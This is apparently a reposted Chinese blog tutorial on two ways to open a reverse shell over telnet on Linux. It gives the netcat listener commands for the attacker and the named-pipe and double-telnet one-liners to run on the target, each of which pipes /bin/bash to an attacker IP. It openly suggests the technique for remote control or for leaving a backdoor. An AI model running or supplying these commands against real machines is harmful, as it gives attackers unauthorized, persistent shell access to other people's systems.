码迷,mamicode.com
首页 > Web开发 > 详细

[Shell]Telnet反弹shell

时间:2019-09-16 19:40:36      阅读:146      评论:0      收藏:0      [点我收藏+]

标签:简单   inux   参考   一点   截图   share   攻击机   终端   链接   

原作者:包子love
文章出处:黑白之道

今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。

前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。

这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。

0x01 第一种

1.攻击机先执行监听:nc -l 2222
技术图片

2.目标机执行:mknod a p; telnet x.x.x.x 2222 0<a | /bin/bash 1>a (x.x.x.x为攻击机ip)

技术图片

3.攻击机已经获得shell(没有提示),尝试执行命令:

技术图片

0x02 第二种

1.攻击机需要开两个终端分别监听两个端口:nc -l 6666,nc -l 5555
技术图片

2.目标机执行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x为攻击机ip)

技术图片

3.目标机已经获得shell,尝试执行命令(第一个终端执行命令会在第二个终端回显):

技术图片

这就是利用telnet反弹shell的两种方式,当然也不仅有这两种,网上可以找到其他各种反弹的方式,不过原理都差不多。

本次演示使用的两个系统都是centos7,且近乎初始化的系统,演示是截图这种效果。根据操作系统不同,有的系统获取到shell或者被目标机telnet连接时是会有回显的。

0x03 参考链接

利用telnet反弹shell的两种方法

[Shell]Telnet反弹shell

标签:简单   inux   参考   一点   截图   share   攻击机   终端   链接   

原文地址:https://www.cnblogs.com/-mo-/p/11528930.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!